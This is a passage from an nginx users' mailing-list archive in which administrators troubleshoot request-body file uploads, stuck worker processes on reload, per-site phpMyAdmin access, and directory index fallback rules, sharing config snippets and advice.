requests via 2x curl). First request should deliver file name, and second should deliver actual file content without ingeration from backend side. I analyzed HTTP flow in wireshark and it looks fine for me (details below). 1. curl --data-binary upload.txt http://localhost/upload - s1 listening on 80 recive POST request with body = "upload.txt". S1 buffer "upload.txt" in /tmp/0000001, generate new POST request with field X-FILE="/tmp/0000001" and pass this request to backend (s2) - s2 listening on 8080 recieve POST request with X-FILE = "/tmp/0000001" - s2 generate HTTP response 200 with body = "Do something sensible with /tmp/0000001\n" and pass it to s1 - s1 recieve above response and pass it to client - client recieve HTTP response 200 with body = "Do something sensible with /tmp/0000001\n" 2. curl --data-binary '@upload.txt' http://localhost/upload If I understand this mechanism correctly now actual upload.txt transfer to server without backend ingeration should be triggered. So I should get reponse 200 and upload.txt content should be saved by server under /tmp/nginx-client-body. Anyway when I type curl --data-binary '@upload.txt' http://localhost/upload whole scenario from previous point is performed again. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270122#msg-270122 From jsharan15 at gmail.com Sat Oct 8 05:34:52 2016 From: jsharan15 at gmail.com (Sharan J) Date: Sat, 8 Oct 2016 11:04:52 +0530 Subject: Nginx old worker process not exiting on reload In-Reply-To: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com> References: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com> Message-ID: Hi, Is there a way to prevent this? Is there any other way to kill such process without the need for rebooting the machine. Thanks, Santhakumari On Wed, Oct 5, 2016 at 4:35 PM, Philip Walenta wrote: > The only thing I ever experienced that would hold an old worker process > open after a restart (in my case config reload) were websocket connections. > > Sent from my iPhone > > > On Oct 5, 2016, at 5:59 AM, Sharan J wrote: > > > > Hi, > > > > While reloading nginx, sometimes old worker process are not exiting > thereby, entering into "uninterrupted sleep" state. Is there a way to kill > such abandoned worker process? How can this process be avoided? > > We are using nginx-1.10.1 > > > > Thanks, > > Santhakumari.V > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Sat Oct 8 15:05:38 2016 From: nginx-forum at forum.nginx.org (nixcoder) Date: Sat, 08 Oct 2016 11:05:38 -0400 Subject: 400 bad request for http m-post method In-Reply-To: <20161005152545.GU73038@mdounin.ru> References: <20161005152545.GU73038@mdounin.ru> Message-ID: <1edee87adc666ded971653ebdd08331e.NginxMailingListEnglish@forum.nginx.org> Awesome!! Thanks a lot, Maxim. The patch fixed the issue. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270087,270129#msg-270129 From reallfqq-nginx at yahoo.fr Sat Oct 8 17:26:57 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sat, 8 Oct 2016 19:26:57 +0200 Subject: Nginx old worker process not exiting on reload In-Reply-To: References: <74BB23D7-FF1F-460D-8543-31BEC864C2D3@gmail.com> Message-ID: RTFM? http://nginx.org/en/docs/control.html --- *B. R.* On Sat, Oct 8, 2016 at 7:34 AM, Sharan J wrote: > Hi, > > Is there a way to prevent this? Is there any other way to kill such > process without the need for rebooting the machine. > > Thanks, > Santhakumari > > On Wed, Oct 5, 2016 at 4:35 PM, Philip Walenta > wrote: > >> The only thing I ever experienced that would hold an old worker process >> open after a restart (in my case config reload) were websocket connections. >> >> Sent from my iPhone >> >> > On Oct 5, 2016, at 5:59 AM, Sharan J wrote: >> > >> > Hi, >> > >> > While reloading nginx, sometimes old worker process are not exiting >> thereby, entering into "uninterrupted sleep" state. Is there a way to kill >> such abandoned worker process? How can this process be avoided? >> > We are using nginx-1.10.1 >> > >> > Thanks, >> > Santhakumari.V >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Sun Oct 9 15:48:33 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 9 Oct 2016 16:48:33 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: <20161007133319.GU11677@daoine.org> Message-ID: <20161009154833.GV11677@daoine.org> On Fri, Oct 07, 2016 at 10:20:51AM -0400, mrast wrote: Hi there, There are many ways that you might have configured things. Only you know the one way that you have configured things. Until you share that, there is not much that others can do. > If i remove the /phpmyadmin section from website1 config file, it just > removes the pre-auth login box and goes straight to the main phpma screen. When you do that, what is the actual url that your browser has requested? It will start with http:// or https://, then it will have website1.com -- I don't care about those bits. Then it will have a /, and then something, and then maybe a ? or a # and something else. The "/something" is the bit that matters here. > I have a symlink for nginx to use phpmyadmin /usr/share/phpmyadmin > /usr/share/nginx/html > > I have a symlink in website2 and 4 directory's for /usr/share/phpmyadmin I am not sure what you mean by that; it may not matter at least until the request and matching config is identified. If you have a new-enough nginx, then nginx -T | grep 'server\|location' may hide enough of the config that you are willing to show the output. Only the "website1" piece is interesting here. And this assumes that there are no directives from the "rewrite" module that will take effect first. Given the "location"s that are defined, and given the request that you make, what one "location" will nginx use to handle the request? That is a place to consider making a change. Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Sun Oct 9 16:05:07 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 9 Oct 2016 17:05:07 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <8260e5aeb7dcb440714376bc3d0f2d37.NginxMailingListEnglish@forum.nginx.org> References: <20161004194642.GK11677@daoine.org> <8260e5aeb7dcb440714376bc3d0f2d37.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161009160507.GW11677@daoine.org> On Fri, Oct 07, 2016 at 03:47:47PM -0400, yurai wrote: Hi there, > Unfortunately still it doesn't work as I expect - upload.txt file content is > not saved on server side in /tmp/nginx-client-body. Oh. Why do you expect that? I would only expect that to happen if I send the upload.txt file content, which I have not done yet. > My understanding is that transfer should be performed in 2 phases (2 POST > requests via 2x curl). Why? Each request is completely independent of each other request. If you want to tie two together, you must add the tying part yourself. (Or use a framework which does it for you). > First request should deliver file name, and second > should deliver actual file content without ingeration from backend side. I > analyzed HTTP flow in wireshark and it looks fine for me (details below). > > 1. curl --data-binary upload.txt http://localhost/upload > > - s1 listening on 80 recive POST request with body = "upload.txt". S1 buffer > "upload.txt" in /tmp/0000001, generate new POST request with field > X-FILE="/tmp/0000001" and pass this request to backend (s2) > - s2 listening on 8080 recieve POST request with X-FILE = "/tmp/0000001" > - s2 generate HTTP response 200 with body = "Do something sensible with > /tmp/0000001\n" and pass it to s1 > - s1 recieve above response and pass it to client > - client recieve HTTP response 200 with body = "Do something sensible with > /tmp/0000001\n" Yes, that is exactly what should happen. Except that you seem to have switched between /tmp and /tmp/nginx-client-body somewhere. > 2. curl --data-binary '@upload.txt' http://localhost/upload This should do exactly the same as the first one, except that now (because of what the curl client does) the POST data is not the string "upload.txt", but is instead the content of the file upload.txt. nginx has no idea that the content came from a file, or what that filename might have been. > If I understand this mechanism correctly now actual upload.txt transfer to > server without backend ingeration should be triggered. > So I should get reponse 200 and upload.txt content should be saved by server > under /tmp/nginx-client-body. You should get something like response 200 with body = "Do something sensible with /tmp/0000002\n", exactly the same format as the first response (but with a different filename.) nginx receives a POST with some body content. nginx writes that body content to a new file in its client_body_temp_path > Anyway when I type curl --data-binary '@upload.txt' http://localhost/upload > whole scenario from previous point is performed again. What is the filename that you get back in the response? What is the content of that file, when you look on the server? It looks to me like everything is working as intended. I have a file /tmp/nginx-client-body/0000000005 which contains the contents of my upload.txt, and I have a file /tmp/nginx-client-body/0000000004 which contains the 10 characters "upload.txt". If you do not have that, what specifically do you have instead? f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Sun Oct 9 16:50:50 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Sun, 09 Oct 2016 12:50:50 -0400 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: <20161009154833.GV11677@daoine.org> References: <20161009154833.GV11677@daoine.org> Message-ID: Hi Francis, Its a brand new server setup. I have no problem sharing the config files - ill just sanitize the actual websites. But everything else is 100% as is. Here is the full nginx.conf file from /etc/nginx cat /etc/nginx/nginx.conf user www-data; worker_processes 1; worker_rlimit_nofile 100000; pid /run/nginx.pid; events { worker_connections 1024; multi_accept on; } http { ## # EasyEngine Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 15; types_hash_max_size 2048; server_tokens off; reset_timedout_connection on; # add_header X-Powered-By "EasyEngine"; add_header rt-Fastcgi-Cache $upstream_cache_status; # Limit Request limit_req_status 403; limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s; # Proxy Settings # set_real_ip_from proxy-server-ip; # real_ip_header X-Forwarded-For; fastcgi_read_timeout 300; client_max_body_size 100m; ## # SSL Settings ## ssl_session_cache shared:SSL:20m; ssl_session_timeout 10m; ssl_prefer_server_ciphers on; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:ECDHE-ECDSA-DES-CBC3-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ## # Basic Settings ## # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; # Log format Settings log_format rt_cache '$remote_addr $upstream_response_time $upstream_cache_status [$time_local] ' '$http_host "$request" $status $body_bytes_sent ' '"$http_referer" "$http_user_agent"'; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; gzip_vary on; gzip_proxied any; gzip_comp_level 2; gzip_buffers 16 8k; gzip_http_version 1.1; gzip_types application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/svg+xml image/x-icon text/css text/plain text/x-component text/xml text/javascript; ## # Cache Settings ## add_header Fastcgi-Cache $upstream_cache_status; fastcgi_cache_key "$scheme$request_method$host$request_uri"; fastcgi_cache_use_stale error timeout invalid_header http_500; fastcgi_ignore_headers Cache-Control Expires Set-Cookie; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; server { listen 80 default_server; server_name _; return 444; } } Here is the full config for website.com - that does need access to phpmyadmin and does have an extra login prompt before /phpmyadmin is shown (which is what th e location /phpmyadmin block dictates cat /etc/nginx/sites-available/website.com fastcgi_cache_path /var/www/html/website.com/cache levels=1:2 keys_zone=website.com:100m inactive=60m; server { server_name website.com www.website.com; access_log /var/www/html/website.com/logs/access.log; error_log /var/www/html/website.com/logs/error.log; root /var/www/html/website.com/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* "/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* "PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location /phpmyadmin { auth_basic "Admin Login"; auth_basic_user_file /etc/nginx/allow_phpmyadmin; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache magentafp.com; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge website.com "$scheme$request_method$host$1"; } } Here is the full config for website1.com - that doesnt need access to phpmyadmin - and thus doesnt have the location /phpmyamin block in it cat /etc/nginx/sites-available/fulgent.co.uk fastcgi_cache_path /var/www/html/website1.com/cache levels=1:2 keys_zone=website1.com:100m inactive=60m; server { server_name website1.com www.website1.com; access_log /var/www/html/website1.com/logs/access.log; error_log /var/www/html/website1.com/logs/error.log; root /var/www/html/website1.com/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* "/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* ?PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache magentafp.com; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge website1.com "$scheme$request_method$host$1"; } } I have made no changes to any phpmyadmin config files. If i go to website1.com/phpmyadmin - the phpmyadmin login page is served. There are no changes to the url - it stays website1.com/phpmyadmin This is the article i followd to install an secure phpmyadmin - i did everything on that page except change the /phpmyadmin location name. (this is where the symlink came into it) So to me that symlink tells nginx too server phpmyadmin php pages for the web server - am i correct? If i remove that symlink - and then just create symlinks for the websites themselves - ive found it doesnt make a difference. eg - a symlink for website.com exisits pointing to /usr/share/phpmyadmin. So im telling nginx to serve phpmyadmin php files for that website only and not the whole server which the /usr/share/phpmyadmin /usr/share/nginx/html symlink does. Here is the output of nginx -T | grep 'server\|location' as requested (ive cut out website2 and website3 bits as they are not relevant as they are just copies of .com and 1.com (.com and 2.com need access 1.com and 3.com dont nginx: the configuration file /etc/nginx/nginx.conf syntax is ok nginx: configuration file /etc/nginx/nginx.conf test is successful server_tokens off; # set_real_ip_from proxy-server-ip; ssl_prefer_server_ciphers on; # server_names_hash_bucket_size 64; # server_name_in_redirect off; server { listen 80 default_server; server_name _; # server { # server { server { server_name website.com www.website.com; location / { location /phpmyadmin { location ~ \.php$ { location ~ /purge(/.*) { fastcgi_param SERVER_PROTOCOL $server_protocol; fastcgi_param SERVER_ADDR $server_addr; fastcgi_param SERVER_PORT $server_port; fastcgi_param SERVER_NAME $server_name; server { server_name website1.com www.website1.com; location / { location ~ \.php$ { location ~ /purge(/.*) { fastcgi_param SERVER_PROTOCOL $server_protocol; fastcgi_param SERVER_ADDR $server_addr; fastcgi_param SERVER_PORT $server_port; fastcgi_param SERVER_NAME $server_name; Thanks for your assistance. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270105,270134#msg-270134 From francis at daoine.org Sun Oct 9 19:41:34 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 9 Oct 2016 20:41:34 +0100 Subject: Allow PHPMyAdmin access on certain virtual hosts - Ubuntu and Nginx In-Reply-To: References: <20161009154833.GV11677@daoine.org> Message-ID: <20161009194134.GX11677@daoine.org> On Sun, Oct 09, 2016 at 12:50:50PM -0400, mrast wrote: Hi there, > I have no problem sharing the config files - ill just sanitize the actual > websites. But everything else is 100% as is. Thanks for this - it does give more information about what is happening. A few notes, with the order switched... > if ($http_cookie ~* ?PHPSESSID"){ If that is a copy-paste of the config file, then it probably won't match some things that you would want it to. > If i go to website1.com/phpmyadmin - the phpmyadmin login page is served. > There are no changes to the url - it stays website1.com/phpmyadmin That piece surprises me. I would expect that it would have issued a redirect to website1.com/phpmyadmin/ That is because, for website1, with the following: > location / { > location ~ \.php$ { > location ~ /purge(/.*) { a request for /phpmyadmin is handled in the first location, which has > try_files $uri $uri/ /index.php?$args; which, since you have > root /var/www/html/website1.com/public/; should check if /var/www/html/website1.com/public//phpmyadmin is a file, and if so serve it; else check if /var/www/html/website1.com/public//phpmyadmin is a directory, and if so serve a redirect to /phpmyadmin/ Oh - unless /var/www/html/website1.com/public//phpmyadmin does not exist, in which case it will be handled internally to nginx as a subrequest to /index.php That makes sense now -- I'm guessing that that path does not exist? Your /index.php subrequest is handled in the second location, which does > try_files $uri =404; > fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; > include fastcgi_params; where try_files checks that the file /var/www/html/website1.com/public//index.php exists, and then contacts your fastcgi server and asks it to process a file. That is probably "SCRIPT_FILENAME" in your fastcgi_params file -- what is that set to? Most likely it is $document_root$fastcgi_script_name, which corresponds to the file /var/www/html/website1.com/public//index.php What happens next is outside of the control of nginx, and is entirely down to your fastcgi server and whatever that php file contains. > Here is the full config for website.com - that does need access to > phpmyadmin and does have an extra login prompt before /phpmyadmin is shown > (which is what th e location /phpmyadmin block dictates Just as an aside - it is possible that some other configuration will protect against this; but it looks to me as though if you access http://website.com/phpmyadmin/index.php you may get access to things without having attempted the nginx basic authentication "extra login" step. > This is the article i followd to install an secure phpmyadmin - i did > everything on that page except change the /phpmyadmin location name. (this > is where the symlink came into it) The link to the article seems to be missing. I'm not sure what exactly this symlink is. For each of the files/directories named above that "try_files" tests, what does "ls -lLd" say that they are? File, directory, or not there? > So to me that symlink tells nginx too server phpmyadmin php pages for the > web server - am i correct? nginx does not "do" php. If php is involved, it is your fastcgi server that handles it. nginx will tell your fastcgi server which file it should attempt to process, though. If the symlink you refer to is one of /var/www/html/website1.com/public//phpmyadmin /var/www/html/website1.com/public//index.php then it will be relevant; if not then it should not be. > eg - a symlink for website.com exisits pointing to /usr/share/phpmyadmin. So > im telling nginx to serve phpmyadmin php files for that website only and not > the whole server which the /usr/share/phpmyadmin /usr/share/nginx/html > symlink does. In the config that you have shown, /usr/share/nginx/html is not relevant, I think. > Here is the output of nginx -T | grep 'server\|location' as requested (ive > cut out website2 and website3 bits as they are not relevant as they are just > copies of .com and 1.com (.com and 2.com need access 1.com and 3.com dont > server { > server_name website.com www.website.com; > location / { > location /phpmyadmin { > location ~ \.php$ { > location ~ /purge(/.*) { > server { > server_name website1.com www.website1.com; > location / { > location ~ \.php$ { > location ~ /purge(/.*) { Those are the initially-important bits. For each request (or internal subrequest), you can tell which one location nginx will use to handle it. Only the configuration in, or inherited into, that location is relevant for this request. >From the above, I think that the file /var/www/html/website1.com/public//index.php may be especially interesting. What is in it? Is it in any way related to phpmyadmin? Good luck with it, f -- Francis Daly francis at daoine.org From me at myconan.net Mon Oct 10 03:56:57 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 12:56:57 +0900 Subject: Index fallback? Message-ID: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> I somehow can't make this scenario work: root structure: /a/index.html /b/ <-- no index.html accessing: 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html 2. site.com/b -> redirect to site.com/b/ -> show @fallback Using try_files $uri $uri/index.html @fallback; doesn't work quite well because #1 becomes this instead: 1. site.com/a -> show /a/index.html and breaks relative path javascript/css files (because it's `/a` in browser, not `/a/`). And using try_files $uri @fallback; Just always show @fallback for both scenarios. Whereas try_files $uri $uri/ @fallback; Always return 403 for #2 because the directory exists and there's no index. As a side note, error_page 404 = @fallback; Wouldn't work because as mentioned in the previous one, it returns 403 for #2 (directory exists, no index), not 404. Is there any way to do it without specifying separate location for each of them? From me at myconan.net Mon Oct 10 06:08:27 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:08:27 +0900 Subject: Index fallback? In-Reply-To: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> Message-ID: <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> Hi, On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > I somehow can't make this scenario work: > > root structure: > /a/index.html > /b/ <-- no index.html > > accessing: > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > after trying out a bit more, this is the closest thing I can make which works: location / { error_page 418 = @dirlist; set $redirect 0; if (-d $request_filename) { set $redirect A; } if (-f $request_filename/index.html) { set $redirect "${redirect}B"; } if ($uri !~ /$) { set $redirect "${redirect}C"; } if ($redirect = ABC) { return 302 $uri/$is_args$args; } if ($redirect = A) { return 418; } } Honestly speaking, it looks terrible. It would help if someone can point me to a better solution. From me at myconan.net Mon Oct 10 06:19:15 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:19:15 +0900 Subject: Index fallback? In-Reply-To: <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> Message-ID: <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> Made a bit more compact but still using ifs. location / { location ~ /$ { error_page 418 = @dirlist; if (-d $request_filename) { set $index_fallback A; } if (!-f $request_filename/index.html) { set $index_fallback "${index_fallback}B"; } if ($index_fallback = AB) { return 418; } } } On Mon, Oct 10, 2016, at 15:08, Edho Arief wrote: > Hi, > > On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > > I somehow can't make this scenario work: > > > > root structure: > > /a/index.html > > /b/ <-- no index.html > > > > accessing: > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > > > From francis at daoine.org Mon Oct 10 06:23:27 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 10 Oct 2016 07:23:27 +0100 Subject: Index fallback? In-Reply-To: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> Message-ID: <20161010062327.GZ11677@daoine.org> On Mon, Oct 10, 2016 at 12:56:57PM +0900, Edho Arief wrote: Hi there, untested, but... > accessing: > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > As a side note, > > error_page 404 = @fallback; > > Wouldn't work because as mentioned in the previous one, it returns 403 > for #2 (directory exists, no index), not 404. Would "error_page 403" Do The Right Thing? (It may be that it matches more than you want it to, of course.) f -- Francis Daly francis at daoine.org From me at myconan.net Mon Oct 10 06:25:49 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:25:49 +0900 Subject: Index fallback? In-Reply-To: <20161010062327.GZ11677@daoine.org> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <20161010062327.GZ11677@daoine.org> Message-ID: <1476080749.2472762.750851769.43375E18@webmail.messagingengine.com> Hi, On Mon, Oct 10, 2016, at 15:23, Francis Daly wrote: > On Mon, Oct 10, 2016 at 12:56:57PM +0900, Edho Arief wrote: > > Hi there, > > untested, but... > > > accessing: > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > As a side note, > > > > error_page 404 = @fallback; > > > > Wouldn't work because as mentioned in the previous one, it returns 403 > > for #2 (directory exists, no index), not 404. > > Would "error_page 403" Do The Right Thing? > > (It may be that it matches more than you want it to, of course.) > Yeah, it matches a bit too much. From nurahmadie at gmail.com Mon Oct 10 06:29:09 2016 From: nurahmadie at gmail.com (Nurahmadie Nurahmadie) Date: Mon, 10 Oct 2016 13:29:09 +0700 Subject: Index fallback? In-Reply-To: <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> Message-ID: Hi On Mon, Oct 10, 2016 at 1:19 PM, Edho Arief wrote: > Made a bit more compact but still using ifs. > > location / { > location ~ /$ { > error_page 418 = @dirlist; > > if (-d $request_filename) { > set $index_fallback A; > } > > if (!-f $request_filename/index.html) { > set $index_fallback "${index_fallback}B"; > } > > if ($index_fallback = AB) { > return 418; > } > } > } > > On Mon, Oct 10, 2016, at 15:08, Edho Arief wrote: > > Hi, > > > > On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > > > I somehow can't make this scenario work: > > > > > > root structure: > > > /a/index.html > > > /b/ <-- no index.html > > > > > > accessing: > > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > Still need more locations, but independent to directories you want to access: server { listen 7770; root /tmp; autoindex on; autoindex_format json; } server { listen 80; server_name localhost; index index.html; root /tmp; location ~ /.*?[^/]$ { try_files $uri @redir; } location @redir { return 301 $uri/; } location ~ /$ { try_files $uri"index.html" @reproxy; } location @reproxy { proxy_pass http://localhost:7770; } } -- regards, Nurahmadie -- -------------- next part -------------- An HTML attachment was scrubbed... URL: From me at myconan.net Mon Oct 10 06:39:56 2016 From: me at myconan.net (Edho Arief) Date: Mon, 10 Oct 2016 15:39:56 +0900 Subject: Index fallback? In-Reply-To: References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> Message-ID: <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> Hi, On Mon, Oct 10, 2016, at 15:29, Nurahmadie Nurahmadie wrote: > Hi > > > On Mon, Oct 10, 2016, at 15:08, Edho Arief wrote: > > > Hi, > > > > > > On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > > > > I somehow can't make this scenario work: > > > > > > > > root structure: > > > > /a/index.html > > > > /b/ <-- no index.html > > > > > > > > accessing: > > > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > > > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > > > > Still need more locations, but independent to directories you want to > access: > > > server { > listen 7770; > root /tmp; > autoindex on; > autoindex_format json; > } > > server { > listen 80; > server_name localhost; > index index.html; > root /tmp; > > location ~ /.*?[^/]$ { > try_files $uri @redir; > } > > location @redir { > return 301 $uri/; > } > > location ~ /$ { > try_files $uri"index.html" @reproxy; > } > > location @reproxy { > proxy_pass http://localhost:7770; > } > } > Thanks, but that's even longer than my ifs. Also one `server { }` and one regexp location too many. From nurahmadie at gmail.com Mon Oct 10 06:50:15 2016 From: nurahmadie at gmail.com (Nurahmadie Nurahmadie) Date: Mon, 10 Oct 2016 13:50:15 +0700 Subject: Index fallback? In-Reply-To: <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> <1476079707.2470157.750840969.0522FF19@webmail.messagingengine.com> <1476080355.2471742.750846529.0BEBE20A@webmail.messagingengine.com> <1476081596.2475034.750857289.6EC29041@webmail.messagingengine.com> Message-ID: Hi, On Mon, Oct 10, 2016 at 1:39 PM, Edho Arief wrote: > Hi, > > On Mon, Oct 10, 2016, at 15:29, Nurahmadie Nurahmadie wrote: > > Hi > > > > > On Mon, Oct 10, 2016, at 15:08, Edho Arief wrote: > > > > Hi, > > > > > > > > On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > > > > > I somehow can't make this scenario work: > > > > > > > > > > root structure: > > > > > /a/index.html > > > > > /b/ <-- no index.html > > > > > > > > > > accessing: > > > > > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > > > > > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > > > > > > > Still need more locations, but independent to directories you want to > > access: > > > > > > server { > > listen 7770; > > root /tmp; > > autoindex on; > > autoindex_format json; > > } > > > > server { > > listen 80; > > server_name localhost; > > index index.html; > > root /tmp; > > > > location ~ /.*?[^/]$ { > > try_files $uri @redir; > > } > > > > location @redir { > > return 301 $uri/; > > } > > > > location ~ /$ { > > try_files $uri"index.html" @reproxy; > > } > > > > location @reproxy { > > proxy_pass http://localhost:7770; > > } > > } > > > > Thanks, but that's even longer than my ifs. Also one `server { }` and > one regexp location too many. > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > Ah, sorry I thought it's obvious that the other server is just served as dummy example, also I have this tendency to avoid `if` as much as possible, so yeah -- regards, Nurahmadie -- -------------- next part -------------- An HTML attachment was scrubbed... URL: From me at myconan.net Mon Oct 10 06:53:58 2016 From: me at myconan.net 